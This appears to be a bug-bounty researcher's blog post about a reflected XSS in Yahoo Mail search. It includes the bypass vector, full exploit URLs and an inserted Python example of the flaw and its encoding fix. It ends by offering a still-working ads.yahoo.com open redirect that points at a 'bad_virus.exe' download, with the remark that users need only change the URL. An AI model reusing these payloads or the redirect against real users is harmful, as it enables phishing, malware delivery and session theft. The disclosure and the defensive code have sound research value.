SilenTx0

[XSS] Yahoo Mail


No user-interaction: <img alt=" autofocus=true onfocus=alert(1) a="">

Why did I use this vector? Because if I put <img src=x onerror=alert(1)>, it deleted onerror=alert(1) (or any other event handler I would have used). After several bypass attempts I noticed that it left the alt and src attributes in place. I couldn't do anything through src, so I used the alt attribute. I saw that if I put a space inside the value of the alt attribute, quotes are automatically inserted at the first space it finds. Now, in the source it looks roughly like this:

<input class="uh-srch-box" autofocus=true onfocus=alert(1) value="<img alt=" name="s">

Why autofocus=true? If I had put only autofocus, ="" would have been appended, because the script checks whether every attribute has a value. If an attribute had no value, it added ="" on its own and my vector would no longer have worked (without user interaction).

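Added example (not the poster's code and not Yahoo's): the reflection point above is the value attribute of the search <input>, so stripping event handlers from the submitted <img> tag cannot protect it; only encoding the quote character at the output sink does. The class and name attributes come from the source line in the post; the two rendering functions and the parser-based check are assumptions for this demonstration.

```python
import html
from html.parser import HTMLParser

# Constructed sample input: the vector quoted in the post, as received in ?s=
SEARCH_TERM = '<img alt=" autofocus=true onfocus=alert(1) a="">'


def render_raw(term: str) -> str:
    """Weak pattern: reflect the term into value="..." unencoded.
    The '"' right after alt= closes the value attribute, so everything
    after it is parsed as attributes of the <input> element itself."""
    return f'<input class="uh-srch-box" value="{term}" name="s">'


def render_escaped(term: str) -> str:
    """Fix: contextual output encoding at the sink. html.escape(quote=True)
    turns '"' into &quot; and '<' into &lt;, so the term can never leave
    the attribute value, whatever tags or handlers it contains."""
    return f'<input class="uh-srch-box" value="{html.escape(term, quote=True)}" name="s">'


class _InputAttrs(HTMLParser):
    """Collects the attributes a tolerant parser assigns to the <input> tag."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = dict(attrs)


def input_attributes(markup: str) -> dict:
    """Return the parsed attribute map of the rendered <input>."""
    parser = _InputAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs


def has_event_handler(markup: str) -> bool:
    """Regression check for the rendered page: any on* attribute on the
    <input> means the reflected term broke out of its attribute context."""
    return any(name.startswith("on") for name in input_attributes(markup))
```

Run has_event_handler over the rendered search page in a test suite; the escaped rendering also round-trips the original term as the value, so the fix costs no functionality.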

But how did they fix it back then, and now you found it again? :)

You know how those Yahoo people are...

They renamed the application that did the search from searchnew to search, instead of using a function that filters the data (Yahoo style).

It's true that if I clicked the link I sent in the first report, the XSS didn't work, but if I put the vector directly into the search, it worked perfectly.

The same thing happened to me with a bug in maps.yahoo.com. Initially I got a duplicate, I reported it again and got valid :)).

The link given in the first report (duplicate): https://us-mg6.mail.yahoo.com/neo/b/searchnew?s=<img+alt="+autofocus=true+onfocus=alert(1)+a="">&fid=%40S%40Search&srchWebUrl=http://search.yahoo.com/search?fr=ush-mail&srchMail=Search+Mail

The link given in the second report (valid): https://us-mg6.mail.yahoo.com/neo/b/search?s=<img+alt="+autofocus=true+onfocus=alert(1)+a="">&fid=%40S%40Search&srchWebUrl=http://search.yahoo.com/search?fr=ush-mail&srchMail=Search+Mail


Won't fix :)

https://ads.yahoo.com/clk?3,eJytjdEKgjAYhZ-mOxE3Z1tIF78tQWmW0Ygu1WWm1oIE0advgdUL9HEuzuE.hx-5vuNSRhjBOM.VPM8yHxEP07JUJWKW4.smL4iD6IJiqz1rDTvFBHDRuCyAN5FMix4-JDlEk5UAKYTrxx32053KVQJ.gbMmkJM3.y5GnIGnqB07MvjVqjYZ0zEZ5bA5xleBRScOYSsGdN1yiTYHdTvVEm953Ii6IOLyXS4tq-q6x3PmwgyHRn3f20NWaW0X-mbyC-CRWOg=,$http://193.27.70.11/bad_virus.exe

To use it, just change the URL at the end :)

PS: it has been working for 3 months now


They haven't been paying for Open Redirects since the beginning of the year :)
